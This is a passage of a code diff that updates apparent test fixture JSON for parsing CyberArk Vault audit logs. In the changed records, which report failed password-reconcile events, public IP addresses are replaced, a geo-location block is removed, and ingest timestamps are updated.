@@ -682,7 +620,7 @@ "reset_immediately": "ReconcileTask", "last_task": "ReconcileTask" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", "station": "10.0.1.20", "action": "CPM Reconcile Password Failed", 
@@ -696,8 +634,8 @@ "event": { "severity": 7, "reason": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", - "ingested": "2021-06-09T10:24:36.176784500Z", - "original": "\u003c7\u003e1 2021-03-15T10:12:19Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:12:19\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:12:19Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.123.103.115;retriescount=1;username=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615803137\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:12:19\",\"IsoTimestamp\":\"2021-03-15T10:12:19Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\n\",\"ExtraDetails\":\"address=34.123.103.115;retriescount=1;username=testark;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"1\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615803137\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. 
Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:37:08.403095100Z", + "original": "\u003c7\u003e1 2021-03-15T10:12:19Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:12:19\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:12:19Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=1;username=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615803137\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:12:19\",\"IsoTimestamp\":\"2021-03-15T10:12:19Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=1;username=testark;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"1\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615803137\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. 
Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "60", "kind": "event", "action": "cpm reconcile password failed", @@ -725,19 +663,8 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "34.66.114.180", - "ip": "34.66.114.180" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "address": "10.0.1.20", @@ -757,7 +684,7 @@ }, "@timestamp": "2021-03-15T12:57:13.000Z", "file": { - "path": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart" + "path": "Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart" }, "ecs": { "version": "1.12.0" 
@@ -769,28 +696,28 @@ ], "ip": [ "10.0.1.20", - "34.66.114.180" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Error", - "reason": "ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", + "reason": "ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", "iso_timestamp": "2021-03-15T12:57:13Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 05:57:13\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T12:57:13Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-35.192.121.42-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask,Failure. 
Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=5;username=ELASTIC\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMDisabled\" Value=\"(CPM)MaxRetries\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"5\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615813031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n 
\u003cTimestamp\u003eMar 15 05:57:13\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T12:57:13Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=5;username=ELASTIC\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMDisabled\" Value=\"(CPM)MaxRetries\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"5\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615813031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Reconcile Password Failed", "issuer": "PasswordManager", "extra_details": { "other": { "retriescount": "5", - "address": "34.66.114.180" + "address": "67.43.156.15" }, "username": "ELASTIC\\bart" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": 
"34.66.114.180", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "WinDomain", @@ -802,9 +729,9 @@ "last_task": "ReconcileTask", "cpm_error_details": "Parameter Reconcile account is mandatory but has an empty value or is not defined", "last_fail_date": "1615813031", - "logon_domain": "34.66.114.180" + "logon_domain": "67.43.156.15" }, - "file": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart", + "file": "Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart", "safe": "partner", "station": "10.0.1.20", "action": "CPM Reconcile Password Failed", 
@@ -818,8 +745,8 @@ "event": { "severity": 7, "reason": "Parameter Reconcile account is mandatory but has an empty value or is not defined", - "ingested": "2021-06-09T10:24:36.176785800Z", - "original": "\u003c7\u003e1 2021-03-15T12:57:13Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 05:57:13\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T12:57:13Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-35.192.121.42-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=5;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMDisabled\\\" Value=\\\"(CPM)MaxRetries\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"5\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615813031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 
05:57:13\",\"IsoTimestamp\":\"2021-03-15T12:57:13Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-35.192.121.42-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=34.66.114.180;retriescount=5;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"34.66.114.180\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"CPMDisabled\",\"Value\":\"(CPM)MaxRetries\"},{\"Name\":\"RetriesCount\",\"Value\":\"5\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615813031\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"34.66.114.180\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:37:08.403100500Z", + "original": "\u003c7\u003e1 2021-03-15T12:57:13Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n 
\u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 05:57:13\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T12:57:13Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). 
